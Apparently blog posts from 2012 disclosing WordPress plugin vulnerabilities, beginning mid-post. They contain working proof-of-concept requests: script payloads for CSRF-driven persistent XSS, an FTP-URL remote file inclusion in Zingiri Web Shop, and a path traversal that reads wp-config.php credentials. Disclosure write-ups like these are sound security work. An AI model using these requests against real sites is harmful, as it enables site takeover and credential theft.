If we either make this request directly, simulating a CSRF attack, or actually create a malicious page and convince an admin on a WordPress blog with this plugin to click on your link, we can cause a persistent XSS due to the lack of a nonce and sanitizing of html input.

GET /wordpress/wp-admin/admin.php?page=quotes-collection&submit=AddQuote&public=on&tags=x&source=<script>alert(1)</script>&author=<script>alert(2)</script>&quote=<script>alert(3)</script> HTTP/1.1
Host: 192.168.80.130

1 2	GET /wordpress/wp-admin/admin.php?page=quotes-collection&submit=AddQuote&public=on&tags=x&source=<script>alert(1)</script>&author=<script>alert(2)</script>&quote=<script>alert(3)</script> HTTP/1.1 Host: 192.168.80.130

July 2, 2012 by Charlie Eriksen

WordPress Zingiri Shop plugin “abspath” remote file inclusion vulnerability

Advisory
Secunia Advisory SA 49676

Analysis
I had been looking at this particular piece of code for a while. At a glance, while the handling of the looks somewhat safe due to the validation that the input path is in fact a directory, so at best you could sort of chain an exploit with this. The question is, how could you take this to a RFI? Lets look at /fws/download.php:

if (isset($_POST['abspath'])) $abspath=$_POST['abspath']; else $abspath=$_GET['abspath'];
if (!is_dir($abspath)) die('Error downloading');
require($abspath.'wp-blog-header.php');

if (isset($_POST['abspath'])) $abspath=$_POST['abspath']; else $abspath=$_GET['abspath'];

if (!is_dir($abspath)) die('Error downloading');

require($abspath.'wp-blog-header.php');

As you see, this may very well look safe at a glance. For us to be able to exploit the fact that the ‘abspath’ variable is user controlled, we need to get a true back from is_dir. I checked with google how to pull this off when providing a remote host. This isn’t possible with HTTP, and nobody suggested an alternative. For this to work, the protocol wrapper needs to support the “stat()” family of functions. HTTP isn’t one of these. But as it turns out, FTP is. Bingo! We now have a piece of code that through a very specific detail in the PHP implementation, that we can exploit.

By putting up a FTP server with some specified credentials, and a file called wp-blog-header.php with some malicious PHP, we can include an URL in the abspath GET parameter, which will exploit this vulnerability:

GET /wordpress/wp-content/plugins/zingiri-web-shop/fws/download.php?abspath=ftp://dog:hello@localhost/ HTTP/1.1
Host: 192.168.80.130

1 2	GET /wordpress/wp-content/plugins/zingiri-web-shop/fws/download.php?abspath=ftp://dog:hello@localhost/ HTTP/1.1 Host: 192.168.80.130

June 21, 2012 by Charlie Eriksen

WordPress Mac Photo Gallery plugin “albid” arbitrary file disclosure vulnerability

Advisory
Secunia Advisory SA 49650

Analysis
This vulnerability relies on a lack of validation of the “albid” in macdownload.php, which is passed straight into the path that is read at line 37 into the response. This cases an arbitrary file disclosure vulnerability.

require_once( dirname(__FILE__) . '/macDirectory.php');

$folder = dirname(plugin_basename(__FILE__));
$file = dirname(dirname(dirname(__FILE__)))."/uploads/mac-dock-gallery/".$_GET['albid'];

    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename='.basename($file));
    header('Content-Transfer-Encoding: binary');
    header('Expires: 0');
    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    ob_clean();
    flush();
    readfile($file);
?>

require_once( dirname(__FILE__) . '/macDirectory.php');

$folder = dirname(plugin_basename(__FILE__));

$file = dirname(dirname(dirname(__FILE__)))."/uploads/mac-dock-gallery/".$_GET['albid'];

header('Content-Description: File Transfer');

header('Content-Type: application/octet-stream');

header('Content-Disposition: attachment; filename='.basename($file));

header('Content-Transfer-Encoding: binary');

header('Expires: 0');

header('Cache-Control: must-revalidate, post-check=0, pre-check=0');

header('Pragma: public');

header('Content-Length: ' . filesize($file));

ob_clean();

flush();

readfile($file);

If we make a request like this, it will cause the code to read out the wp-config.php file, which will contain database credentials in.

GET /wp-content/plugins/mac-dock-gallery/macdownload.php?albid=../../../wp-config.php HTTP/1.1
Host: 192.168.80.130

1 2	GET /wp-content/plugins/mac-dock-gallery/macdownload.php?albid=../../../wp-config.php HTTP/1.1 Host: 192.168.80.130